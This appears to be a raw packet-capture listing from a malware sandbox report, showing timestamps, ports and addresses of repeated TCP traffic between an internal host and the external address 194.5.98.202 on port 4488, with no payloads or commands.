Feb 25, 2021 07:31:21.995497942 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.997164965 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.997220039 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.998437881 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.998601913 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.998639107 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.998668909 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:21.999440908 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:21.999509096 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.001374960 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.001442909 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.001494884 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.003608942 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.003633022 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.003691912 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.005484104 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.006406069 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.006468058 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.006596088 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.007216930 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.007272005 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.007353067 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.008493900 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.008554935 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.084425926 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.166819096 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.166954041 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.167527914 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.167607069 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.226522923 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.226705074 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.227390051 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.227528095 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.228555918 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.228626013 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.229593039 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.229677916 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.230521917 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.230586052 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.231585026 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.231626034 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.231658936 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.231702089 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.232563019 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.232660055 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.233582020 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.233643055 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.234658957 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.234719038 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.235564947 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.235624075 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.236471891 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.236545086 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.237519979 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.237560987 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.237584114 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.237607002 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.238485098 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.238548994 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.239579916 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.239641905 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.240389109 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.240452051 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.241491079 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.241555929 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.242914915 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.242981911 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.243356943 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.243415117 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.244618893 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.244640112 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.244714022 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.244734049 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.245686054 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.245748043 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.246387005 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.246460915 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.247359037 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.247419119 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.249727011 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.249808073 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.249911070 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.249964952 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.250386000 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.250443935 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.251446962 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.251507044 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.252635002 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.252657890 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.252713919 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.254117966 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.254206896 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.254250050 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.254264116 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.254290104 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.255263090 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.255325079 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.257200956 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.257282972 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.257494926 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.257558107 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.258460045 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.258546114 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.260281086 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.260346889 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.260395050 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.260472059 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.261360884 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.261435986 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.261542082 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.261600971 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.262188911 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.262257099 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.263647079 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.263710022 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.265125036 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.265197039 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.265297890 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.265340090 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.265363932 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.265388966 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.266238928 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.266304970 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.267692089 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.267759085 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.268735886 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.268804073 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.270446062 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.270495892 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.270517111 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.270539045 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.272303104 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.272375107 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.272448063 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.272511959 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.273632050 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.273673058 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.273695946 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.273720026 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.274235010 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.274302006 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.276410103 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.276480913 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.277169943 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.277239084 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.278249025 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.278291941 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.278353930 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.278373957 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.279557943 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.279611111 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:22.279628992 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:22.279664040 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:26.252368927 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:26.515533924 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:26.515655994 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:26.516120911 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:26.824225903 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:26.824314117 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:26.911163092 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:27.125567913 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:27.154206038 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:27.154266119 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:27.421303034 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:27.421442986 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:27.737574100 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:27.737716913 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.056492090 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.056624889 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.062479973 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.063462973 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.063507080 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.066829920 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.068114042 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.068162918 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.068802118 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.069295883 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.070379972 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.070449114 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.071317911 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.071374893 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.071469069 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.073482990 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.277789116 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.342695951 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.342870951 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.343336105 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.343375921 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.343427896 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.343501091 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.345285892 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.345876932 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.346486092 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.346529961 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.346626043 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.348567009 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.349354029 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.349522114 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.350761890 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.350821972 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.350909948 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.351532936 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.351835966 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.351924896 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.352051973 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.353534937 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.354360104 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.354429960 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.355700016 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.355762959 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.356236935 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.546700954 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.546791077 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.547408104 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.563478947 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.613678932 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.613739967 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.613862991 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.613917112 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.614281893 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.614382029 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.614510059 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.614582062 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.615370035 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.615439892 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.616394997 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.616467953 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.616549015 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.616590977 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.616671085 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.616691113 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.626346111 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.626389027 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.626504898 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.626507044 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.626526117 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.628319979 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.628360987 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.628432035 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.628652096 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.628674030 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.630594969 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.630661964 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.630856991 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.630973101 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631002903 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631015062 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631068945 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631088972 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631160975 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631201982 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631222963 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631277084 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631340981 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631376982 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631421089 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631422997 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631433964 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631494045 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631498098 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631535053 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.631589890 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.631603003 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.633348942 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.633439064 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.633451939 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.633496046 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.633548975 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.633560896 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.635238886 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.635299921 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.636240005 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.636315107 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.637270927 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.637310028 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.637392044 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.637417078 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.638395071 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.638463974 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.639280081 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.639347076 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.640461922 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.640527010 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.641119957 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.641160011 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.641191959 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.641252995 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.817694902 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.817761898 CET	4488	49173	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:28.817837000 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:28.817887068 CET	49173	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:32.597897053 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:32.852516890 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:32.852647066 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:32.853198051 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:33.167308092 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:33.167426109 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:33.251379013 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:33.461092949 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:33.466182947 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:33.470505953 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:33.761472940 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:33.761607885 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.080504894 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.080615044 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.429282904 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.429817915 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.447355032 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.448363066 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.448436022 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.449557066 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.450293064 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.450376034 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.452430964 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.453708887 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.455352068 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.455393076 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.455459118 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.457305908 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.459547997 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.459656000 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.707612038 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.708259106 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.709363937 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.710459948 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.711340904 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.712493896 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.713377953 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.714234114 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.714432001 CET	49174	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:34.716265917 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.717256069 CET	4488	49174	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:34.717417002 CET	49174	4488	192.168.2.22	194.5.98.202
